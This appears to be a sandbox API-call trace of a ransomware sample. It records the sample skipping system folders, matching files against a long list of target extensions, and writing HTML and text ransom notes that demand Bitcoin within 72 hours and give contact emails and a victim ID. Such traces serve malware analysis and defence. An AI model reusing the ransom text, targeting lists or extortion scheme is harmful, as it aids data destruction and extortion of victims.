	[0198.237] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="webcache") returned 0x0
	[0198.237] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.237] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="inetcache") returned 0x0
	[0198.237] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.238] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="nvidia") returned 0x0
	[0198.238] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.238] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="packages") returned 0x0
	[0198.238] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.238] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="cookies") returned 0x0
	[0198.238] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.238] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="programdata") returned 0x0
	[0198.238] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b1a6533, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b1a6533, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b1a6533, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0198.239] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x2b1a6533, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b1a6533, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b1a6533, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0198.239] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0198.239] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0198.239] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\"
	[0198.239] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\desktop.ini") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\desktop.ini"
	[0198.239] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\desktop.ini") returned 57
	[0198.239] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0198.239] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\desktop.ini", cchLength=0x39 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\desktop.ini") returned 0x39
	[0198.240] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.240] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0198.240] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\desktop.ini" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\desktop.ini") returned="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\desktop.ini"
	[0198.240] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\desktop.ini") returned 57
	[0198.240] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0198.240] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.240] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0198.241] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.241] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0198.241] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x2b1a6533, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b1a6533, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b1a6533, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0
	[0198.241] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0198.241] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0198.242] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures"
	[0198.242] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\*.*"
	[0198.242] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0198.242] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0198.242] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\HELP_DECRYPT_YOUR_FILES.TXT") returned 73
	[0198.242] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0198.243] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0198.243] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0198.247] CloseHandle (hObject=0x384) returned 1
	[0198.247] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0198.247] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0198.248] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0198.249] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0198.249] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0198.249] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0198.249] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0198.249] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0198.250] CloseHandle (hObject=0x384) returned 1
	[0198.250] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0198.250] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0198.250] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0198.251] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\HELP_DECRYPT_YOUR_FILES.HTML") returned 74
	[0198.251] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0198.255] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0198.256] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0198.258] CloseHandle (hObject=0x384) returned 1
	[0198.259] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0198.259] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0198.259] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0198.260] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0198.261] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0198.262] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0198.262] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0198.262] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0198.262] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0198.262] CloseHandle (hObject=0x384) returned 1
	[0198.262] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b1a6533, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b1a6533, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x8fb28467, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0198.263] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\*.*") returned 49
	[0198.263] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0198.263] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\*.*", cchLength=0x31 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*") returned 0x31
	[0198.263] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.263] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="windows") returned 0x0
	[0198.263] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.264] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="boot") returned 0x0
	[0198.264] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.264] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="system volume information") returned 0x0
	[0198.264] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.264] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0198.264] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.264] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="temp") returned 0x0
	[0198.265] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.265] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="program files") returned 0x0
	[0198.265] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.265] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="program files (x86)") returned 0x0
	[0198.265] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.265] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="appdata") returned 0x0
	[0198.265] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.266] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="application data") returned 0x0
	[0198.266] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.266] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="winnt") returned 0x0
	[0198.266] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.266] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="tmp") returned 0x0
	[0198.266] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.266] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="cache") returned 0x0
	[0198.266] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.267] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="temporary internet files") returned 0x0
	[0198.267] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.267] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="webcache") returned 0x0
	[0198.267] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.267] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="inetcache") returned 0x0
	[0198.267] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.267] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="nvidia") returned 0x0
	[0198.268] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
